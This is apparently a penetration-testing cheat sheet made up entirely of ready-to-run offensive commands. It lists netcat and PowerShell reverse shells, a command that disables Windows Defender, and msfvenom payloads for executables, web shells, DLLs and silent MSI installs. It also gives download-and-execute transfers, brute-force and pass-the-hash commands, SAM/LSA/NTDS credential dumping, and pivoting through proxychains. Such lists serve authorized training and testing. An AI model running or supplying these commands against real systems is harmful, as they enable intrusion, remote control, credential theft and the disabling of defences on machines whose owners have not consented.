Payloads & Shells
Netcat
sudo nc -lvnp <port>
nc -nv <ip> <port>
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <ip> <port> > /tmp/f
PowerShell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
msfvenom — Stageless Payloads
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho
msfvenom — Staged Payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=8443 -f exe > maintenanceservice.exe
msfvenom — Web Shells
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
msfvenom — DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" <user> /add /domain' -f dll -o adduser.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=8080 -f dll > backupscript.dll
msfvenom — MSI
msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<port> -f msi > shell.msi
msiexec /i shell.msi /quiet /qn /norestart
Metasploit Modules
use exploit/windows/smb/psexec
use exploit/windows/smb/ms17_010_psexec
use auxiliary/scanner/smb/smb_ms17_010
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
shell
Webshell Locations (Kali / Pwnbox)
/usr/share/webshells/laudanum
/usr/share/nishang/Antak-WebShell
Shell Spawning
python3 -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
lua -e 'os.execute("/bin/sh")'
awk 'BEGIN {system("/bin/sh")}'
find / -name <file> -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
TTY Upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
File Transfers
sudo python3 -m http.server 8001
IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.exe')
impacket-smbserver -ip <ip> -smb2support -username <user> -password <password> shared /home/<user>/Downloads/
sudo python3 smbserver.py -smb2support CompData /home/<user>/Documents/
certutil.exe -urlcache -split -f http://<ip>:8080/shell.bat shell.bat
Password Wordlist Generation
cewl https://<target> -d 4 -m 6 --lowercase -w wordlist.txt
hashcat --force password.list -r custom.rule --stdout > mut_password.list
./username-anarchy -i /path/to/names.txt
Brute Force — Remote Services
netexec winrm <ip> -u user.list -p password.list
netexec smb <ip> -u "<user>" -p "<password>" --shares
hydra -L user.list -P password.list <service>://<ip>
hydra -l <user> -P password.list <service>://<ip>
hydra -L user.list -p <password> <service>://<ip>
hydra -C <user_pass.list> ssh://<ip>
Pass-the-Hash
evil-winrm -i <ip> -u Administrator -H "<hash>"
netexec smb <ip> --local-auth -u <user> -p <password> --sam
netexec smb <ip> --local-auth -u <user> -p <password> --lsa
netexec smb <ip> -u <user> -p <password> --ntds
Pivoting
ssh -D 9050 <user>@<dmz_ip>
sudo vim /etc/proxychains.conf
# socks4 127.0.0.1 9050
sudo proxychains -q nmap -sT -Pn <internal_ip> --open
proxychains xfreerdp /v:<internal_ip> /u:<user> /p:<password>
Network Packet Credential Extraction
./Pcredz -f demo.pcapng -t -v
Snaffler / SMB Share Hunting
snaffler.exe -s
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public